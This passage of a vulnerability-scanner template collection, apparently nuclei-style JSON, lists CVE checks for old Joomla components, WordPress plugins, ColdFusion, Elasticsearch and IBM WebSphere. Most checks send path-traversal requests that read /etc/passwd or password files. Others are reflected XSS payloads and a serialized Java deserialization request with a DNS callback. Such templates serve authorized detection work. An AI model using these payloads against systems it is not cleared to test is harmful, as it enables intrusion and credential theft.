Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File 